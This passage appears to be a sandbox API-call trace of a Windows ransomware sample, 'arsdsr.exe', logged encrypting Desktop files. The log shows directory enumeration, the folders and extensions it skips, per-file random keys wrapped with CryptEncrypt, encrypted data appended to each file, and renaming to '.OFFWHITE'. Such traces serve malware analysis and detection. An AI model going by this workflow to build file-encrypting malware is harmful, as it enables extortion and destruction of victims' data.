MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7xzldiaq\\thnwclcbt.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7XzLDIAQ\\ThnWCLCBt.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7xzldiaq\\thnwclcbt.gif.offwhite")) returned 1 [0131.951] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5a83450, ftCreationTime.dwHighDateTime=0x1d5e2e9, ftLastAccessTime.dwLowDateTime=0xb81ba560, ftLastAccessTime.dwHighDateTime=0x1d5e1fe, ftLastWriteTime.dwLowDateTime=0xb81ba560, ftLastWriteTime.dwHighDateTime=0x1d5e1fe, nFileSizeHigh=0x0, nFileSizeLow=0xabce, dwReserved0=0x295debc, dwReserved1=0xb0ec7c6, cFileName="ThnWCLCBt.gif", cAlternateFileName="THNWCL~1.GIF")) returned 0 [0131.951] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0131.951] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad949460, ftCreationTime.dwHighDateTime=0x1d5da67, ftLastAccessTime.dwLowDateTime=0x8752ebc0, ftLastAccessTime.dwHighDateTime=0x1d5e058, ftLastWriteTime.dwLowDateTime=0x8752ebc0, ftLastWriteTime.dwHighDateTime=0x1d5e058, nFileSizeHigh=0x0, nFileSizeLow=0x11c63, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="8h d.csv", cAlternateFileName="8HD~1.CSV")) returned 1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2=".") returned 1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="..") returned 1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="...") returned 1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="windows") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="$recycle.bin") returned 1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="rsa") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="ntuser.dat") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="programdata") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="appdata") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="program files") returned -1 [0131.951] lstrcmpiW (lpString1="8h d.csv", lpString2="program files (x86)") returned -1 [0131.951] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.951] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="8h d.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv" [0131.951] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.951] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.951] PathFindExtensionW (pszPath="8h d.csv") returned=".csv" [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".log") returned -1 [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".cab") returned 1 [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".cmd") returned 1 [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".com") returned 1 [0131.951] lstrcmpiW (lpString1=".csv", lpString2=".cpl") returned 1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".url") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".mp3") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".pif") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".mp4") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".OFFWHITE") returned -1 [0131.952] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0131.952] lstrcmpiW (lpString1="8h d.csv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.952] GetProcessHeap () returned 0x500000 [0131.952] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e98 [0131.952] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8h d.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.953] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=72803) returned 1 [0131.953] GetProcessHeap () returned 0x500000 [0131.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.954] GetProcessHeap () returned 0x500000 [0131.954] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.954] GetProcessHeap () returned 0x500000 [0131.954] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.954] GetProcessHeap () returned 0x500000 [0131.954] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.954] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.954] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.954] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.954] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.955] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11c63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.955] SetLastError (dwErrCode=0x0) [0131.955] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.975] GetLastError () returned 0x0 [0131.975] GetLastError () returned 0x0 [0131.975] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11d63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.975] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.976] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11e63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.976] WriteFile (in: hFile=0xb0, lpBuffer=0x547e98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547e98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.976] GetProcessHeap () returned 0x500000 [0131.976] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x11c63) returned 0x5557b0 [0131.976] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.976] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x11c63, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x11c63, lpOverlapped=0x0) returned 1 [0131.981] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.981] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x11c63, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x11c63, lpOverlapped=0x0) returned 1 [0131.982] GetProcessHeap () returned 0x500000 [0131.982] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0131.982] CloseHandle (hObject=0xb0) returned 1 [0131.993] GetProcessHeap () returned 0x500000 [0131.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.993] GetProcessHeap () returned 0x500000 [0131.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.993] GetProcessHeap () returned 0x500000 [0131.993] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.994] GetProcessHeap () returned 0x500000 [0131.994] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.994] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv" [0131.994] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv.OFFWHITE" [0131.994] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8h d.csv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8h d.csv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8h d.csv.offwhite")) returned 1 [0131.995] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5be98050, ftCreationTime.dwHighDateTime=0x1d5db00, ftLastAccessTime.dwLowDateTime=0x951881d0, ftLastAccessTime.dwHighDateTime=0x1d5d88c, ftLastWriteTime.dwLowDateTime=0x951881d0, ftLastWriteTime.dwHighDateTime=0x1d5d88c, nFileSizeHigh=0x0, nFileSizeLow=0x14f62, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="9Lm7cJqYP8NXI71qj.png", cAlternateFileName="9LM7CJ~1.PNG")) returned 1 [0131.995] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2=".") returned 1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="..") returned 1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="...") returned 1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="windows") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="$recycle.bin") returned 1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="rsa") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="ntuser.dat") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="programdata") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="appdata") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="program files") returned -1 [0131.996] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="program files (x86)") returned -1 [0131.996] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0131.996] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="9Lm7cJqYP8NXI71qj.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png" [0131.996] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.996] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.996] PathFindExtensionW (pszPath="9Lm7cJqYP8NXI71qj.png") returned=".png" [0131.996] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0131.996] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0131.997] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0131.997] lstrcmpiW (lpString1="9Lm7cJqYP8NXI71qj.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.997] GetProcessHeap () returned 0x500000 [0131.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ea8 [0131.997] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9lm7cjqyp8nxi71qj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.998] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=85858) returned 1 [0131.998] GetProcessHeap () returned 0x500000 [0131.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.998] GetProcessHeap () returned 0x500000 [0131.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.998] GetProcessHeap () returned 0x500000 [0131.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.998] GetProcessHeap () returned 0x500000 [0131.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.998] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.998] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.998] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.998] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.998] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.999] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.999] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.999] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.999] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14f62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.999] SetLastError (dwErrCode=0x0) [0131.999] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.001] GetLastError () returned 0x0 [0132.001] GetLastError () returned 0x0 [0132.001] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.001] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.001] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15162, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.002] WriteFile (in: hFile=0xb0, lpBuffer=0x547ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ea8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.002] GetProcessHeap () returned 0x500000 [0132.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14f62) returned 0x5557b0 [0132.002] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.002] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x14f62, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x14f62, lpOverlapped=0x0) returned 1 [0132.010] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.010] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x14f62, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x14f62, lpOverlapped=0x0) returned 1 [0132.010] GetProcessHeap () returned 0x500000 [0132.010] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.010] CloseHandle (hObject=0xb0) returned 1 [0132.017] GetProcessHeap () returned 0x500000 [0132.017] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.017] GetProcessHeap () returned 0x500000 [0132.017] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.017] GetProcessHeap () returned 0x500000 [0132.017] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.017] GetProcessHeap () returned 0x500000 [0132.018] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.018] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png" [0132.018] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png.OFFWHITE" [0132.018] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9lm7cjqyp8nxi71qj.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Lm7cJqYP8NXI71qj.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9lm7cjqyp8nxi71qj.png.offwhite")) returned 1 [0132.019] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb158c160, ftCreationTime.dwHighDateTime=0x1d5dc61, ftLastAccessTime.dwLowDateTime=0x6645b460, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0x6645b460, ftLastWriteTime.dwHighDateTime=0x1d5dace, nFileSizeHigh=0x0, nFileSizeLow=0xeea0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="a8wUGSK.wav", cAlternateFileName="")) returned 1 [0132.019] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2=".") returned 1 [0132.019] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="..") returned 1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="...") returned 1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="windows") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="$recycle.bin") returned 1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="rsa") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="ntuser.dat") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="programdata") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="appdata") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="program files") returned -1 [0132.020] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="program files (x86)") returned -1 [0132.020] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.020] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="a8wUGSK.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav" [0132.020] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.020] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.020] PathFindExtensionW (pszPath="a8wUGSK.wav") returned=".wav" [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".log") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".cab") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".cmd") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".com") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".cpl") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".url") returned 1 [0132.020] lstrcmpiW (lpString1=".wav", lpString2=".ttf") returned 1 [0132.021] lstrcmpiW (lpString1=".wav", lpString2=".mp3") returned 1 [0132.021] lstrcmpiW (lpString1=".wav", lpString2=".pif") returned 1 [0132.021] lstrcmpiW (lpString1=".wav", lpString2=".mp4") returned 1 [0132.021] lstrcmpiW (lpString1=".wav", lpString2=".OFFWHITE") returned 1 [0132.021] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0132.021] lstrcmpiW (lpString1="a8wUGSK.wav", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.021] GetProcessHeap () returned 0x500000 [0132.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547eb8 [0132.021] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a8wugsk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.021] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=61088) returned 1 [0132.021] GetProcessHeap () returned 0x500000 [0132.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.022] GetProcessHeap () returned 0x500000 [0132.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.022] GetProcessHeap () returned 0x500000 [0132.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.022] GetProcessHeap () returned 0x500000 [0132.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.022] SystemFunction036 (in: RandomBuffer=0x5487a8, 